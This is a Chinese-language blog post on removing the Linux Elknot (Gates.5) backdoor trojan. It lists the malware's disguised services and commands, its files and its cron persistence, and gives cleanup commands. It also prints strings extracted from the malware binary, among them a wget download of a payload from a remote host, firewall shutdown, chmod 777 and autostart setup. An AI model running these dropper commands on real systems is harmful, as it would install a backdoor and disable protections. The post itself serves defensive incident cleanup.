Linux Unix.Trojan.Elknot (Linux.BackDoor.Gates.5)木馬清理
可用clamAV掃描, 顯示是Linux Unix.Trojan.Elknot木馬病毒(Linux.BackDoor.Gates.5),
參考:
這個木馬,偽裝和自我保能力很強,要想徹底清除必須要認識到該木馬病毒的特性
1、關閉防火牆
2、偽裝系統服務
3、偽裝系統命令
4、定時自動啟動
認識到這些後採取相應的在動作
1、關閉防活牆
mv /etc/init.d/iptables iptables2
2、偽裝系統服務
偽裝的系統服務有
DbSecuritySpt
selinux
taskgrm-
可先把這些服務停止,
service taskgrm- stop
chkconfig --del taskgrm-
rm /etc/init.d/taskgrm-
...
3、偽裝系統命令
偽裝的系統命令有:
ps
netstat
lsof
bsd-port
要把這些檔案刪除掉,從別的系統裡再copy過來
4、定時自動啟動
木馬病毒是修改了/etc/crontab檔案
木最後還需要清除木馬病毒檔案及程序
/bin/install.rar
/root/xl123
/bin/socket
/bin/install.tar
/bin/.sshd
cnet2
mysql515
socket
taskgrm-
xl123
我是通過對install.rar
解壓install.rar,裡面的檔案都是病毒檔案,
用vim 開啟mysql515從其中的一些片斷可弄清該病毒是如何工作的
^@service iptables stop^
@/bin/install.tar^@wget -c -P /bin http://%s/install.tar^@^@^
@tar -xf /bin/install.tar -C /bin/^@%s/xl123^@/root/xl123^@chmod 0777
/bin/mysql515^@chmod 0777 /bin/socket^@chmod 0777 /bin/cnet2^@chmod 0755
/root/xl123^@rm -rf /root/xl123h /usr/bin/%s^@nohup /bin/socket > /dev/null 2>&1
&^@/bin/rc.local^@%s/rc.local^@/etc/rc.local^@%s/crontab^@/etc/crontab^@%s/%s^@a^@cd %s
chmod 777 %s/%s
./%s^@chmod 777 %s/%s^@a+^@*/55 * * * * root %s/%s
^@/etc/init.d/taskgrm-
^@/bin/taskgrm-
^@^@^@chmod 777 /etc/init.d/taskgrm-
^@^@ln -s /etc/init.d/taskgrm- /etc/rc.d/rc5.d/taskgrm-
^@chmod 777 /etc/rc.d/rc5.d/taskgrm-
^@chkconfig --add taskgrm-^@mysql515^@/bin^@cngamemafix.sh^@r^@the file1 can not open %s
^@w^@^@^@^@the new file can not open %s
其中有關閉防火牆壁, 下載病毒程式install.tar,新增自啟動服務,定進執行等,
通過這些線索可幫助我們去清理該病毒